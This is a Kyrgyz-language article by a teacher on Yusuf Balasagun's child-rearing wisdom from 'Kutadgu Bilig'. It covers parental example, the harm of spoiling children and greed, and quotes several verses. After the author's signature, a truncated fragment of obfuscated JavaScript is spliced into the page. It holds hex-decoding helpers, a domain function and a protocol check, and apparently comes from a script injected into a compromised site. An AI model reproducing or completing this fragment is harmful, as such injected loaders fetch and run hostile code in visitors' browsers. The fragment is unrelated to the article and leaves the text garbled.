Жусуп  Баласагынга – 1000 жыл

Эрке өстүбү балдарың – жаман адат

Өмүр бою кайгыда жашың агат

1-Жусуп Баласагын

Өзүм педагог болуп 40 жылдан бери балдарды тарбиялап, өстүрүп, ушул ишти аркалап  келе жаткандыктан Жусуп Баласагындын «Кут Билим» китебиндеги таалим-тарбия  саптары мага абдан жагып, окурмандар менен ошол ойлорумду бөлүшсөм дедим.

Азыркы балдар – эртеңки ата-энелер демекчи, мен өзүмдүн окуучуларыма да Жусуп атабыздын акылдарын жеткизе айтып бергенге аракет кылып жүрөм.

«Ата көргөн ок жонот, эне көргөн тон бычат» дегендей, Жусуп Баласагын балдарды  тарбиялоодо ата-эненин тарбиясы биринчи орунду тураарын айтат. Ата өз уулуна туура  жол көрсөтүп, акыл-насаатын айтып, билим берип чоңойтсо, ал бала эстүү болоорун  жазат.  Ошондой эле баланы жалкоо кылбай ар кандай жумуштарга көндүрүп, иштерман  кылып чоңойтсо, ал бала бойго жеткенде башкаларга кор болбой, ишке чоркок болбой, өзүн да, ата-энесин да багат.

Балам эмгекчил болсун деген ата, өзү эмгекчил болушу керек. Себеби, өзү үлгү боло  албаса, же сырттан иштебесе, же короо-жайдын ишин жасабаса, бала кайдан эмгекчил  болот? Балага кичинекейинен тартып эле акыл айтып, эмгекке үйрөтүү зарыл.

Ата-эне уул-кызга дайыма үлгү болоорун эске алышыбыз керек. Эгерде биз  балдарга туура  эмес сапаттарды көргөзсөк, ал кемчиликтерибиз кийин балдарыбыздын өздөрүнөн көрүнөт.

Демек, жакшы же жаман баланы өстүрүү – өзүбүздүн  колубузда  экен. Бул жөнүндө  Жусуп Баласагын минтип белгилейт:

Ата жолун көрсө бала тегинде

Көнүп кетет оорго да, жеңилге

Бала өссө ар тараптуу таалим алып,

Ата-эненин андайда жүзү жарык.

Ким эле баласын жаман болсун десин, баласы жакшы болсо ата-энесине сыймык эмеспи, улуу ойчул айткандай, жүзү жарык эмеспи.

«Жакшы бала ата-энени төргө сүйрөйт, жаман бала ата-энени көргө сүйрөйт» дегендей,  эч качан балдар жаман болуп ата-энени жер каратпасын.

«Уулдун урматын  көр, кыздын кызматын көр» деген жакшы бата бар элибизде. Уулуң  жакшы болсо, кемтигиңди толтуруп, атагыңды чыгарып, башыңа бак кондурат  экен.  Бирок андайга жетиш үчүн ата-эне көп аракеттениши керек.

Жакшы балдар билимдүү, эмгекчил эле болбостон, алар жашоодо чыдамкай, сабырдуу, токтоо, көтөрүмдүү болгону жана аларга буюрган нерсеге ыраазы болгонду, бар нерсеге каниет кылганды үйрөтүү дурус. «Бул нерсе жок болсо эмне болот эле? Ушуга да Кудайга ыраазы бололу» дегенди дайыма айтып, жакшы сөздүн арты жакшыга алып келээрин, топуктук кемди келтирээрин билдириш керек.

Азыркы учурда жаштардын көбү байлыкка умтулуп, «бай болсом эле бактылуу болот элем» деп ойлошот. Байлыкты эң биринчи орунга коюшуп, байлардын баарын бактылуу  деп эсептешет. Бирок, турмуш чындыгы көрсөткөндөй, адамда материалдык байлык  жетиштүү болгону менен, ал адамдын  ички дүйнөсү жакыр, же дени сак эмес, жашоодогу Кудай берген сулуулукту сезбей, кубанып-сүйүнүп жашаганды билбей, же бирөөлөргө  кубаныч, мээрим тартуулай албай жашап өтүшү мүмкүн. Ошондуктан, жаштар ойдон, сөздөн жаңылбай, жакшы тилектерди оюнда, көкүрөгүндө ала жүргөнү оң. Чиримдүү байлык деп жүрүп, чиримсиз байлыктан, башкача айтканда, жан дүйнө байлыгынан, акыл дүйнө байлыгынан, сезим дүйнө байлыгынан кемип калуу баардыгынан коркунучтуу жана андай адам эң бактысыз.

Ач көз адамдар кайдан жаралат? Алар ач көз болуп туулбайт, алар туура эмес тарбия  алгандыктан байлыкты эңсеп, жутунуп калышат. Андай адам эч качан тойбойт, элин  ойлобойт, жакындарын жыргатпайт.

Баланы оюна коюп, каалаганынын баарын аткарып, алам дегенинин баарын алып берип  турган ата-эненин тарбиясы таптакыр туура эмес. Балам башка балдардан кем болбосун деп материалдык жактан камсыздап турган сайын ал балдардын чыдамы жок, эрке болуп, ал оокат кайдан, кандай келээрин билбей калат  экен.

Балага кичинекейинен сөз укканды үйрөтүп, акыл алганды бил деп кулагына сиңдире  бербесе, кийин ал миң кайталаса да кабыл албайт. Азыркы чоң көйгөйдүн бири ушул: бала ата-эне менен маек түзүүнүн ордуна, интернет жана телефон менен алек болуп  калды.

Жусуп Баласагын атабыздын эрке бала жөнүндө жазган саптарын окуйлу:

А уулуң өскөн болсо эрке-талтаң,

Үмүт үз – адам чыкпайт андайлардан.

Билип ал, жолун айткан тарбиянын,

Көп жашап, көп балалуу бир атанын:

«Эрке өстүбү балдарың – жаман адат,

Өмүр бою кайгыда жашың агат.

Эрке өстүрсөң балаңды корсуң анда,

Күнөө атада, бирөөгө доомат  кылба.

Балдары орой болсо сөз укпаган,

Күнөөнү издөө керек эне-атадан.

Таалим берип өстүрсөң уул-кызды,

Арылтасың кырсыктан асыл башты.

Балдарды жакшы карма таалим менен,

Анда ата ар кырсыктан алыс экен.

Уул-кызың билимди алса терең,

Кор болушпай, көңүлдүү  жашайт!» деген.

1000 жыл мурда айтылган бул насааттын дал бүгүнкү күнү ата-энелерге зарыл болуп жаткан учуру. «Капшапты кайыштырган заман болду» деген шылтоо менен канчалаган  ата-эне балдарына тарбия берүүгө убакыт таппай, күн эмес ай артынан ай, жыл артынан жыл өткөрүп келатышат. А бирок, андай балдар кийин өзүн да, үй-бүлөсүн да бага албаганы, кыйнаганы аз келгенсип, жашы өтүп калган ата-энесин да кошо кайгы-капага салат. Андайды Кудай эч кимге бербесин. Ошондуктан, эрте ойлонуп, тарбияны эрте баштаганга ата-энелердин жолу салынып турсун.

Бүбүкан ЖУСУПОВА

 

 

 

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "kok-asaba.journalist.kg"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Комментарий кошуу

Сиздин электрондук почтаңыз жарыяланбайт. Милдеттүү талаалар белгиленген *